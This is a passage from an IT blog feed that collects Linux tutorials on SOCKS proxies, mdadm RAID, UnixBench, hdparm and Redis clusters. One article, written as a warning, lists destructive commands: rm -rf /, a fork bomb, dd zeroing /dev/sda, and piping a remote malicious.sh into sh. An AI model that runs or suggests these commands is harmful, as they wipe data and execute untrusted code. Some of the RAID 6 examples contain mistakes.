This configuration defines a SOCKS server that listens on all available interfaces (0.0.0.0) on port 1080. It uses username authentication and allows connections from and to any address.

Creating a User for the Proxy

For the proxy to be secure and not open to the public, it’s necessary to create a specific user for the connection. This is achieved with the following commands:

sudo useradd -r -s /bin/false username
sudo passwd username

Here, username is the username you wish for the proxy connection. The useradd command creates the user, and passwd allows you to assign a password.

Restarting and Enabling Dante Service

With the user created and the configuration file adjusted, it’s time to restart the Dante service and ensure it runs at system startup:

sudo systemctl restart danted.service
sudo systemctl enable danted.service
sudo systemctl status danted.service

Furthermore, it’s important to ensure that port 1080, where the proxy listens, is allowed in the firewall:

sudo ufw allow 1080/tcp

Verifying the Connection

Finally, to verify everything is working correctly, you can test the connection through the proxy with the following command:

curl -v -x socks5://username:password@your_server_ip:1080 https://whatismyip.com/

Remember to replace username, password, and your_server_ip with your specific information. This command will use your proxy server to access a website that shows your public IP address, thus verifying that traffic is indeed being redirected through the SOCKS proxy.

Setting up a SOCKS proxy server with Dante may seem complex at first, but by following these steps, you can have a powerful system

You can configure a SOCKS5 proxy server using OpenSSH on Ubuntu 22.04, which is a simpler and more direct alternative in certain cases, especially for personal use or in situations where you already have an SSH server set up. Below, I explain how to do it:

Creating a Socks 5 Proxy with OpenSSH

Unlike Dante, with which we can create a proxy service with authentication, with OpenSSH, we can create a tunnel on a port that can be used as a SOCKS proxy without authentication, so it is convenient to use it only for localhost within a single computer (we will explain this better later)

Installing OpenSSH Server

If you don’t already have OpenSSH Server installed on your server that will act as the proxy, you can install it with the following command as long as it’s a Debian / Ubuntu-based distribution:

sudo apt update
sudo apt install openssh-server

Ensure the service is active and running correctly with:

sudo systemctl status ssh

Configuring the SSH Server (Optional)

By default, OpenSSH listens on port 22. You can adjust additional configurations by editing the /etc/ssh/sshd_config file, such as changing the port, restricting access to certain users, etc. If you make changes, remember to restart the SSH service:

sudo systemctl restart ssh

Using SSH as a SOCKS5 Proxy

To configure an SSH tunnel that works as a SOCKS5 proxy, use the following command from your client (not on the server). This command establishes an SSH tunnel that listens locally on your machine on the specified port (for example, 1080) and redirects traffic through the SSH server:

ssh -D 1080 -C -q -N user@server_address
  • -D 1080 specifies that SSH should create a SOCKS5 proxy on local port 1080.
  • -C compresses data before sending.
  • -q enables silent mode that minimizes log messages.
  • -N indicates no remote commands should be executed, useful when you only want to establish the tunnel.
  • user is your username on the SSH server.
  • server_address is the IP address or domain of your SSH server.

At this point, we mention that with the -D option, you should only specify the port as exposing the port to the entire network may allow other devices on the network to use this proxy without authenticating:

[ger@ger-pc ~]$ ssh -D 0.0.0.0:1081 root@192.168.54.100

If we check with the command ss or netstat, we can see that it is listening on all networks:

[ger@ger-pc ~]$ ss -putan|grep 1081
tcp LISTEN 0 128 0.0.0.0:1081 0.0.0.0:* users:(("ssh",pid=292405,fd=4)) 
[ger@ger-pc ~]$

However, if we connect by specifying only the port without 0.0.0.0 or without any IP, it will only do so on localhost:

[ger@ger-pc ~]$ ssh -D 1081 root@192.168.54.100

.......

[ger@ger-pc ~]$ ss -putan|grep 1081
tcp LISTEN 0 128 127.0.0.1:1081 0.0.0.0:* users:(("ssh",pid=292485,fd=5)) 
tcp LISTEN 0 128 [::1]:1081 [::]:* users:(("ssh",pid=292485,fd=4)) 
[ger@ger-pc ~]$

Connecting Through the SOCKS5 Proxy:

Now you can configure your browser or application to use the SOCKS5 proxy on localhost and port 1080. Each application has a different way of configuring this, so you will need to review the preferences or documentation of the application.

Automating the Connection (Optional):
If you need the tunnel to be established automatically at startup or without manual interaction, you may consider using a tool like autossh to keep the tunnel connection open and reconnect in case it drops.

This is an effective way to establish a quick SOCKS5 proxy for a user or a few users, especially useful for bypassing network restrictions or securing your traffic on untrusted networks. The main advantage of this method is its simplicity and that it leverages existing SSH infrastructure without the need to configure additional software on the server.

La entrada Create SOCKS Proxy with Dante and OpenSSH se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/create-socks-proxy-with-dante-and-openssh/feed/ 0
How to create a software RAID on linux with mdadm https://aprendeit.com/en/how-to-create-a-software-raid-on-linux-with-mdadm/ https://aprendeit.com/en/how-to-create-a-software-raid-on-linux-with-mdadm/#respond Fri, 15 Mar 2024 17:26:22 +0000 https://aprendeit.com/?p=2534 Today we wanted to extend this article on how to create a software RAID on linux with mdadm. We start with the theory. What is a RAID? We can define ...

La entrada How to create a software RAID on linux with mdadm se publicó primero en Aprende IT.

]]>
Today we wanted to extend this article on how to create a software RAID on linux with mdadm. We start with the theory.

What is a RAID?

We can define a disk raid as a group or array of independent disks, in fact RAID is an acronym for Redundant Array of Independent Disks. The disks are unified by software or hardware to redundant data and/or use the full capacity of each disk as a whole. This will be easier to understand when we define each type of RAID later.

Difference between hardware RAID and software RAID

  • What is Software RAID?

Software RAID is, as the name says, an application that allows the creation of RAIDs at a logical level from disks connected to our computer. This software creates a file system in which it works behaving according to the type of RAID configured.

  • What is Hardware RAID?A hardware raid is a physical device that allows the creation of a RAID of disks.  It can be a PCI or PCIE expansion card or it can be integrated in the motherboard, this hardware integrates everything necessary to perform a RAID without using the processor or the system’s RAM (as a general rule), it can also integrate a cache. This cache can speed up read/write operations.

What are their main differences and the advantages of each one?

  • Hardware RAID requires hardware which carries a cost.
  • With hardware RAID, in case of disk failure, we only need to insert the new disk and the RAID is usually rebuilt without any additional steps (as a general rule).
  • Software RAID avoids the point of failure of a single RAID card. If this card fails the RAID will not work.
  • In today’s systems the difference in performance compared to hardware RAID is less noticeable as processors are more powerful.
  • Hardware RAID does not use resources of the host machine’s processor.

Most used RAID levels

· RAID 0 (Data Striping, Striped Volume)

This raid takes the capacity of the added disks and adds them together. For example if we have 2 disks of 1TB with this RAID we will get a volume of 2TB. If the disks are of different capacities, it always takes the lowest one to use, as well as the RPM (revolutions per minute) of the disk. That is to say, if we have a 2TB disk at 7200RPM and another of 1TB at 5400RPM we will have a volume of 2TB at 5400RPM, that is to say, we return to have a volume of 2TB but slower. That is why it is important that the disks are similar.

On the other hand, in this type of RAIDs performance is a priority but not security, there is no data redundancy so if a disk breaks the volume will be corrupted.

raid-0

· RAID 1 (mirror)

This RAID as in the previous RAID and in all the RAID, the disks must have the same capacity to avoid wasting disks. In this RAID mode the two disks are configured in mirror, this means that the entire contents of the disk is replicated on another disk for every 2 disks 1 disk is dedicated to redundant data. It is recommended for 2 disks. This RAID has an added advantage and they are greater speed of reading multiuser since data of the two disks can be read. However writes are slower as they have to be done on both disks.

raid-1

· RAID 5

This RAID is the most popular due to its low cost. With 3 disks approximately 75% of the disk capacity is available. It requires only a minimum of 3 disks and supports the complete loss of one disk. The information is served in blocks distributed by the total of the disks so the more disks the more performance also influences the size of the disks the bigger they are the more time it takes to rebuild the RAID in case of failure of a disk. This RAID protects against failures by distributing the parity calculation over all the disks and thus protecting against possible hardware errors.

The weakness of this type of RAID is that if a disk fails, until it is replaced the volume is unprotected against failure of another disk. This is where Spare disks come in. A spare disk is a reserve disk that enters “to be part of the game” when one of the disks fails, this way the number of disks that can fail is two (as long as the RAID is not in reconstruction process when the second disk fails) This way we avoid the failure point mentioned before. When the spare disk is added, this type of RAID is also known as RAID 5E. There are two types of spare: “standby spare” and “hot spare”.

If it is a standby spare it involves a rebuilding process during the addition of the spare disk replacing the failed disk, however if it is a hot spare this time is minimized.

raids-RAID-5

· RAID 6

Let’s say it is the evolution of RAID 5, it needs at least 4 disks. It works like RAID 5 but with double parity stripe which is also spread over all disks. This type of RAID supports the total failure of up to two disks even during the RAID rebuild. It is less used because when few disks are used the capacity of two disks is wasted because they do not reach the theoretical maximum, with 4 disks the RAID will have about half the capacity of the disks. The more disks used in the RAID, the more capacity of each disk is used.

As in RAID 5, in RAID 6 spare disks can be added (usually called RAID 6E) to support a third failed disk (the latter can fail without corrupting the volume as long as the raid is not being rebuilt).

raids-RAID-6

Nested RAID levels

Nested RAID levels is “RAID on RAID”. That is a RAID of one type mounted on RAID(s) of another type. This way you can take advantage of the benefits of each RAID. For example:

  • RAID 0+1 : It is a mirror of RAIDs 0, that is to say if we have 4 disks, 2 raids 0 are created with each pair of disks and with the 2 RAID volumes created a raid 1 is created. In this way we add redundancy to RAID 0.
  • RAID 1+0: It is a RAID 0 of two mirrors (RAID 1). Two RAID 1 are created with each pair of disks and with the pair of RAID 1 created, a RAID 0 is created.
  • RAID 50 (5+0): For this RAID a minimum of 6 disks are required. With each trio of disks a RAID 5 is created. Then with each RAID created a RAID 0 is created with the RAID 5 created. With 6 disks a total of approximately 65% of the disk capacity is reached.

The most common RAID types are:

  • RAID 0: For storage of non-critical data of which loss is not important.
  • RAID 1: For operating systems, e.g. on servers. The operating system is usually installed on a RAID 1.
  • RAID 5: Storage in general because of its low cost and good reliability.

How to mount in linux each type of RAID with “mdadm”:

A raid in linux is very easy to configure using the steps we are going to describe:

Step 1: Install mdadm: by default it is not usually installed on Linux.

In debian and derivatives:

apt-get install mdadm

On RedHat / CentOS and derivatives:

yum install mdadm

install-mdadm

Step2: The disks to be included in the RAID must be filled with zeros to avoid problems with existing file systems:

root@localhost:~# mdadm --zero-superblock /dev/hdb /dev/hdc

(And so many other disks to use) or with DD:

dd

Step 3: The next thing would be to create the RAID, basically it would be with:

mdadm -C /dev/NOMBRERAID --level=raid[NUMERO] --raid-devices=NUMERO_DE_DISCOS /dev/DISCO1 /dev/DISCO2
  • RAID 0: A minimum of two disks are selected (e.g. vdc and vdd):
mdadm -C /dev/md0 --level=raid0 --raid-devices=2 /dev/vdc /dev/vdd

 

RAID-0-terminal

Como crear un RAID por software en linux con mdadm

  • RAID 1: In the case of RAID 1 it is best to select a maximum of 2 disks / volumes (we use vdc and vdd as examples):

 

mdadm -C /dev/md0 --level=raid1 --raid-devices=2 /dev/vdc /dev/vdd

 

raid1

  • RAID 5: At least three disks:

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=3 /dev/vdb /dev/vdc /dev/vdd

 

raid5

If we want a spare disk (we have to add all the disks including the spare to the RAID from the beginning):

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=3 --spare-devices=1 /dev/vdb /dev/vdc /dev/vdd /dev/vde

 

 

  • RAID 6: At least 4 disks

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=4 /dev/vdb /dev/vdc /dev/vdd /dev/vde

 

And with spare parts:

 

mdadm -C /dev/md0 --level=raid5 --raid-devices=4 --spare-devices=1 /dev/vdb /dev/vdc /dev/vdd /dev/vde /dev/vdf

 

 

In case of failure of a disk of a RAID we only must extract it and insert the new disk and when we introduce the new disk (looking at the system log of /var/log/messages) we execute:

 

mdadm --add /dev/RAID /dev/NUEVO_DISCO

 

In case you want to stop a RAID:

 

mdadm --stop /dev/md0 && mdadm --remove /dev/md0
Y para consultar el estado:

cat /proc/mdstat

And this has been all about how to create a software RAID in linux with mdadm.

If you liked the article leave a comment and/or share on your social networks.

See you soon!

La entrada How to create a software RAID on linux with mdadm se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/how-to-create-a-software-raid-on-linux-with-mdadm/feed/ 0
Commands you should not run in Linux https://aprendeit.com/en/commands-you-should-not-run-in-linux/ https://aprendeit.com/en/commands-you-should-not-run-in-linux/#respond Sun, 25 Feb 2024 20:23:55 +0000 https://aprendeit.com/?p=6077 In the vast world of Linux, the terminal is a powerful tool that grants users unprecedented control over their systems. However, with great power comes great responsibility. There are certain ...

La entrada Commands you should not run in Linux se publicó primero en Aprende IT.

]]>
In the vast world of Linux, the terminal is a powerful tool that grants users unprecedented control over their systems. However, with great power comes great responsibility. There are certain commands that, while they may seem harmless or curious at first glance, can cause irreparable damage to your system. In this article, we will explore ten of these lethal commands, explaining in detail why you should keep them away from your terminal.

The Devastating rm -rf /

We start with the infamous rm -rf / command, a statement that seems simple but hides destructive potential. This command deletes all system files, starting from the root (/). The -r modifier indicates that deletion should be recursive, that is, affect all files and directories contained in the specified directory, while -f forces deletion without asking for confirmation. Running this command as a superuser means saying goodbye to your operating system, your data, and any hope of easy recovery.

In short, be careful with executing recursive rm commands as we can delete more than we want:

  • rm -fr *
  • rm -fr */
  • rm -fr /*
  • rm -fr .
  • rm -fr ..

The Trap of :(){ :|: & };:

This enigmatic command is an example of a fork bomb function. It defines a function called : that, when executed, calls itself twice, and each call is executed in the background. This causes a chain reaction, doubling processes indefinitely and consuming system resources until it hangs. It’s a denial of service attack against your own machine, pushing processing and memory capacity to the limit.

To better understand, :(){ :|: & };: is the same as running:

bomb() {
    bomb | bomb &;
}; bomb

The Danger of dd if=/dev/zero of=/dev/sda

The dd command is a powerful tool used to convert and copy files at the block level. In this context, if=/dev/zero sets the input to a continuous stream of zeros, and of=/dev/sda designates the target device, usually the main hard drive. This command overwrites the entire disk with zeros, irreversibly erasing the operating system, programs, and user data. It is essential to understand the function of each part of the command before executing something as powerful as dd.

Downloading and Executing a Malicious File

For example, the command wget http://example.com/malicious.sh -O- | sh

This command uses wget to download a script from an Internet address and executes it directly in the shell with sh. The danger lies in executing code without reviewing it, coming from an unreliable source. It could be a malicious script designed to damage your system or compromise your security. It is always vital to verify the content of scripts before executing them.

Dangerous Modification of Permissions and Properties

Modifying permissions with, for example, chmod 777 / -R can render your system unusable.
chmod changes the permissions of files and directories, and 777 grants full permissions (read, write, and execute) to all users. Applying this recursively (-R) to the root (/) removes any form of access control, exposing the system to serious security risks. Any user could modify any file, with potentially disastrous consequences.

The chown nobody:nogroup / -R Command

Similar to the previous case, chown changes the owner and group of files and directories. Using nobody:nogroup assigns ownership to a user and group without privileges, applied recursively from the root, can leave the system in an inoperable state, as critical services and processes might lose access to the files necessary for their operation.

The Mysterious mv /home/your_user/* /dev/null

Moving files to the /dev/null directory is equivalent to deleting them, as /dev/null is a black hole in the system that discards everything it receives. This command, applied to the user directory, can result in the loss of all personal data, settings, and important files stored in your home.

The Dangerous find

The find command can be very dangerous, for example, if we execute the following command:

find / -name '*.jpg' -type f -delete

What happens is that find is a versatile tool for searching for files in the file system that meet certain criteria. This command searches for all .jpg files in the system and deletes them. Although it might seem useful for freeing up space, indiscriminately deleting files based only on their extension can result in the loss of important documents, memories, and resources.

 

Causing a Kernel Panic

The following command is capable of causing a kernel panic:

echo 1 > /proc/sys/kernel/panic;

Causing a Kernel Panic error in Linux is comparable to the dreaded blue screen of death in Windows, debunking the belief that Linux is infallible. Through certain commands, like redirecting random data to critical system devices or directly manipulating memory, Linux can be forced into a kernel panic state, making the system unrecoverable without a reboot. These commands are highly risky and can result in data loss or system corruption.

Overwriting the System Disk with the Output of a Command

Overwriting the hard drive in Linux, using commands that redirect the output of any Bash command directly to a disk device (/dev/hda), can result in total data loss. This process is irreversible and differs from formatting, as it involves writing raw data over the entire unit, making it unusable. It’s a highly dangerous action with no practical benefit in most contexts.

An example of this would be:

command1 > /dev/sda1

Protect Your System, Protect Your Peace of Mind

Exploring and experimenting with Linux can be a rewarding and educational experience. However, it’s crucial to do so with knowledge and caution. The commands discussed here represent only a fraction of what is possible (and potentially dangerous) in the terminal. The golden rule is simple: if you’re not sure what a command does, research before executing it. Protecting your system is protecting your work, your memories, and ultimately, your peace of mind.

 

 

La entrada Commands you should not run in Linux se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/commands-you-should-not-run-in-linux/feed/ 0
Performance Testing in Linux with UnixBench https://aprendeit.com/en/performance-testing-in-linux-with-unixbench/ https://aprendeit.com/en/performance-testing-in-linux-with-unixbench/#respond Tue, 26 Dec 2023 06:44:38 +0000 https://aprendeit.com/?p=5981 For Linux enthusiasts, conducting performance tests is key to getting the most out of their systems. UnixBench is an essential tool in this process, offering a detailed analysis of the ...

La entrada Performance Testing in Linux with UnixBench se publicó primero en Aprende IT.

]]>
For Linux enthusiasts, conducting performance tests is key to getting the most out of their systems. UnixBench is an essential tool in this process, offering a detailed analysis of the performance of Linux and Unix systems.

What is UnixBench?

UnixBench is an open-source performance test suite designed for Unix and Linux systems. It is characterized by its ease of use and depth, allowing the performance of various system components to be measured.

Installation of UnixBench

The installation of UnixBench is simple and is carried out through a few commands in the terminal:
Clone the UnixBench repository:

git clone https://github.com/kdlucas/byte-unixbench.git

Access the UnixBench directory:

cd byte-unixbench/UnixBench

Compile and build UnixBench:

make

Running Your First Test with UnixBench

To launch your first test, follow these steps:
In the same UnixBench folder, execute:

./Run

This will start a series of tests that will evaluate different aspects of your system.

Analysis of Results

The results of UnixBench are presented in the form of scores and data, providing a clear idea of your system’s performance in areas such as CPU, memory, and disk operations.

Advanced Tests

UnixBench allows specific tests for different components. For example, to focus on the CPU:

./Run dhry2reg whetstone-double

Customizing Tests

UnixBench offers the flexibility to customize the tests. You can choose which tests to run and adapt them to your specific needs.

Real-Time Monitoring

While the tests are running, it is useful to perform real-time monitoring of the system using tools such as top or htop.

Network Performance Testing

In addition to the basic components, UnixBench can also evaluate your system’s network performance, a crucial aspect for servers or network-dependent environments.

Integration with Monitoring Tools

UnixBench can be integrated with advanced system monitoring tools, providing a detailed analysis of system performance during tests.

Tips for Optimizing Performance

After the tests, you can identify areas for improvement and start optimizing your system, adjusting configurations, updating hardware, or modifying the software environment.

La entrada Performance Testing in Linux with UnixBench se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/performance-testing-in-linux-with-unixbench/feed/ 0
The hdparm Utility: Tune Your Disk https://aprendeit.com/en/the-hdparm-utility-tune-your-disk/ https://aprendeit.com/en/the-hdparm-utility-tune-your-disk/#respond Tue, 05 Dec 2023 06:38:49 +0000 https://aprendeit.com/?p=5947 Do you want to get the most out of your hard drive or SSD? hdparm is your tool. Developed by Mark Lord in 2005, this Linux utility allows you to ...

La entrada The hdparm Utility: Tune Your Disk se publicó primero en Aprende IT.

]]>
Do you want to get the most out of your hard drive or SSD? hdparm is your tool. Developed by Mark Lord in 2005, this Linux utility allows you to diagnose and optimize your disk, control its speed, manage power saving, and even securely erase SSDs.

Installation and Basic Usage

Most Linux distributions already include hdparm. To start, open a terminal and run:

 hdparm -I /dev/sda | more

This command will show you all the available information about your disk, including the model and firmware version.

Measuring Disk Speed

To know the data transfer speed of your disk, use:

 hdparm -t /dev/sda

Repeat the measurement several times to get an average. If you want to measure the pure speed of the disk, without the effect of the system buffer, use hdparm -t --direct /dev/sda. You can also specify an offset with hdparm -t --direct --offset 500 /dev/sda to test different areas of the disk.

Optimizing Data Transmission

To improve data transmission, hdparm allows you to adjust the number of sectors read at once with the command:

hdparm -m16 /dev/sda

This command configures the simultaneous reading of 16 sectors. Additionally, you can activate the “read-ahead” function with hdparm -a256 /dev/sda, which causes the disk to preemptively read 256 sectors.

Controlling 32-Bit Mode and Disk Noise

With hdparm -c /dev/sda, you can check if your disk is operating in 32-bit mode, and force this mode with -c3. If your disk is noisy, you can reduce the noise by activating the “acoustic mode” with hdparm -M 128 /dev/sda, or maximize speed with `hdparm -M 254 /dev/sda​​​​.

Managing Write Cache

The command hdparm -W /dev/sda allows you to activate or deactivate the write cache, which can speed up data writing but at the risk of data loss in case of power cuts.

Setting Power Saving Mode

You can manage the disk’s power saving with hdparm -B255 /dev/sda to deactivate it, or use values between 1 and 254 for different levels of saving and performance. With hdparm -S 128 /dev/sda, you set the idle time before the disk enters sleep mode.

Cleaning SSDs

SSDs can accumulate residual data blocks. To clean them, use the script wiper.sh /dev/sda, but with caution, as it can lead to data loss.

Secure Erasure in SSDs

For securely erasing an SSD, hdparm offers the “secure erase” function with

hdparm --user-master u --security-erase 123456 /dev/sdb

This process completely removes data, but requires caution as it can render the SSD unusable in some cases.

Handling Old IDE Disks

For IDE disks, it is important to check and configure DMA with hdparm -d1 /dev/hda to improve data transfer. If you encounter problems, deactivate it with `hdparm -d0 /dev/hda​​.

Maintaining Changes After Restarting

To ensure that changes made with hdparm persist after restarting, you must add them to the system startup scripts or, in Debian-based systems, in the /etc/hdparm.conf file.
Remember that this is a powerful tool and should be used with knowledge. Always make backups before making significant changes and consult specific documentation.

La entrada The hdparm Utility: Tune Your Disk se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/the-hdparm-utility-tune-your-disk/feed/ 0
How to Create a Redis Cluster: Step-by-Step Guide https://aprendeit.com/en/how-to-create-a-redis-cluster-step-by-step-guide/ https://aprendeit.com/en/how-to-create-a-redis-cluster-step-by-step-guide/#respond Mon, 27 Nov 2023 08:23:20 +0000 https://aprendeit.com/?p=5914 Hello! If you’re here, you’re probably looking to learn how to set up a Redis cluster. We’ll go step by step, explaining each detail so you can implement it without ...

La entrada How to Create a Redis Cluster: Step-by-Step Guide se publicó primero en Aprende IT.

]]>
Hello! If you’re here, you’re probably looking to learn how to set up a Redis cluster. We’ll go step by step, explaining each detail so you can implement it without any issues. Redis, as you may know, is an in-memory database, famous for its speed and efficiency in handling key-value data. A Redis cluster not only improves data availability and partitioning but is also essential for large-scale systems.

Preparing the Environment

Before you begin, you need to have Redis installed on your system. You can download it from its official page. Once installed, verify its operation with the redis-server command. You should see a message indicating that Redis is functioning.

Initial Node Configuration

A Redis cluster is composed of several nodes. For this example, we’ll configure three nodes on the same machine to simplify things. Create three different directories, each representing a Redis node. In each directory, you’ll need a configuration file for the node. You can name it redis.conf.
Inside redis.conf, set the following configurations:

conf
Copy code
port [NODE_PORT]
cluster-enabled yes
cluster-config-file nodes.conf
cluster-node-timeout 5000
appendonly yes

Make sure to change [NODE_PORT] to a unique port for each node.

Starting the Nodes

Now, start each Redis node with its respective configuration. Open a terminal for each node and execute:

redis-server ./redis.conf
Creating the Cluster

With the nodes running, it’s time to form the cluster. Redis provides a tool called redis-cli for handling administrative tasks. Use it to create the cluster with the following command:

redis-cli --cluster create [NODE1_IP]:[PORT1] [NODE2_IP]:[PORT2] [NODE3_IP]:[PORT3] --cluster-replicas 1

Make sure to replace [NODE_IP] and [PORT] with the corresponding IP addresses and ports of your nodes.

Cluster Verification

After creating the cluster, verify its status with:

redis-cli --cluster check [NODE_IP]:[PORT]

This command will give you a detailed report of the status of your cluster.

Handling Keys in the Cluster

Now that you have your cluster, it’s important to know how to handle keys within it. Redis handles keys through a technique called sharding, where keys are distributed among the different nodes.
To insert a key, use:

redis-cli -c -p [PORT] SET [KEY_NAME] [VALUE]

To retrieve a key:

redis-cli -c -p [PORT] GET [KEY_NAME]

Remember that -c allows redis-cli to automatically redirect the command to the correct node.

Error Handling and Recovery

It’s vital that you know how to handle situations when something goes wrong. In a Redis cluster, if a node fails, the system will automatically try to use a replica to maintain availability. However, it’s important to monitor the state of the cluster and perform regular maintenance.
To check the status of the nodes, use:

redis-cli -p [PORT] CLUSTER NODES

If a node has failed and you need to replace it, you can do so without stopping the cluster. Follow the initial configuration steps for a new node and then use it to replace the failed node with redis-cli.

Scaling Your Cluster

As your application grows, you might need to scale your cluster. Redis allows you to add more nodes to the cluster without interruptions. To add a new node, set it up as we have seen before and then use it in the cluster with:

redis-cli --cluster add-node [NEW_NODE_IP]:[NEW_PORT] [EXISTING_NODE_IP]:[EXISTING_PORT]

Then, if necessary, you can rebalance the keys among the nodes.

Maintenance and Monitoring

Regular maintenance is crucial. Make sure to keep your Redis version up to date and to regularly check the logs. It’s also a good idea to set up a monitoring system to receive alerts about problems in the cluster.
I hope this guide has been helpful for you to create and manage your Redis cluster. As you’ve seen, with a few commands and some configuration, you can have a robust and scalable system. Remember, practice makes perfect, so don’t hesitate to experiment and learn more about this powerful system.

La entrada How to Create a Redis Cluster: Step-by-Step Guide se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/how-to-create-a-redis-cluster-step-by-step-guide/feed/ 0